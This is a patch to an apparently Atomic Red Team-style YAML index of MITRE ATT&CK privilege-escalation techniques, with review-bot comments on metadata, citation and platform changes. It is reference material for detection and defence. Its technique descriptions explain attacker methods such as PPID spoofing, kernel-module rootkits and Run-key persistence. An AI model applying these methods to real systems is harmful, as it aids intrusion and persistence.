+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19834,9 +20162,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1134.003:
@@ -19900,7 +20225,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -19989,7 +20313,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1134.004:
@@ -20047,7 +20370,7 @@ privilege-escalation:
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe
rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe
), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-03T02:15:42.360Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Access Token Manipulation: Parent PID Spoofing'
x_mitre_detection: |-
@@ -20072,12 +20395,11 @@ privilege-escalation:
- Host Forensic Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.004
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -20103,7 +20425,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -20117,7 +20438,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -20144,8 +20464,8 @@ privilege-escalation:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
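Review bot: the replacement URL for `Microsoft File Handlers` points at a `previous-versions/visualstudio/visual-studio-2015` page, i.e. an archived document, and the `Retrieved` date is reset to September 12, 2024 for what is still the same (n.d.) reference. Replacing a dead msdn.microsoft.com link with the archived copy is fine, but it would be better to note that the target is an archived page, since learn.microsoft.com removes previous-versions content over time and this citation may need another refresh.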
@@ -20156,7 +20476,8 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1055.014:
@@ -20227,7 +20548,7 @@ privilege-escalation:
resources, and possibly elevated privileges. Execution via VDSO hijacking
may also evade detection from security products since the execution is masked
under a legitimate process. "
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-07T17:09:09.048Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: VDSO Hijacking
x_mitre_detection: "Monitor for malicious usage of system calls, such as ptrace
@@ -20254,7 +20575,6 @@ privilege-escalation:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.014:
technique:
@@ -20294,7 +20614,7 @@ privilege-escalation:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -20314,12 +20634,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -20373,11 +20692,10 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -20464,9 +20782,9 @@ privilege-escalation:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -20479,12 +20797,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -20520,16 +20837,15 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
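Review bot: the `Azure AD`, `Office 365` and `Google Workspace` platforms are removed from T1098 and replaced by `Office Suite` and `Identity Provider` (with `x_mitre_version` bumped to 2.7). Anything derived from `x_mitre_platforms`, in particular per-platform index files or filters keyed on the old platform names, has to be regenerated in the same change or it will keep listing techniques under platforms that no longer exist in this data.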
@@ -20570,7 +20886,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests:
- name: Azure - adding user to Azure role in subscription
@@ -20732,138 +21047,137 @@ privilege-escalation:
elevation_required: false
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
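Review bot: in the T1547.006 `description` and `x_mitre_detection` block scalars, the inline command and path names (`kextload` / `and kextunload` / `commands`, `modprobe` / `, insmod` / `, lsmod`, `/lib/modules`, `kext_policy`) sit on their own lines, and those continuation lines carry no `+`/`-` prefix in the removed text or the added text. That pattern usually means inline code markup was stripped when the block was rendered; since `|-` and `|` preserve newlines, the source YAML should be checked to confirm the names are still inline and the sentences are not broken mid-line. The only content changes in this otherwise reordered block are the `modified` timestamp, `x_mitre_attack_spec_version` 2.1.0 to 3.2.0 and the iDefense Rootkit Overview URL moving to https with a new retrieved date; `x_mitre_version` staying at 1.3 is consistent with citation-only edits.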
@@ -20900,7 +21214,7 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
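Review bot: `modified` for T1574.013 moves backwards, from 2022-05-11 to 2022-03-22, while every other technique in this patch moves forward to a 2023 or 2024 timestamp. A regression like this normally means the object was re-fetched from an older bundle than the rest, or the previous value was a local edit; confirm which ATT&CK release this object came from before merging.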
@@ -20926,12 +21240,10 @@ privilege-escalation:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
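Review bot: T1574.013 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` in this hunk, and unlike T1547.006 (which goes to 3.2.0) nothing re-adds an attack spec version here. Check that the rest of the T1574.013 block still carries an `x_mitre_attack_spec_version`; otherwise this is the one technique in the file with no spec version at all, which is consistent with its older `modified` value and again points at a mixed-source regeneration.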
@@ -21009,9 +21321,8 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1574:
@@ -21078,7 +21389,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -21152,11 +21462,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -21173,7 +21482,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
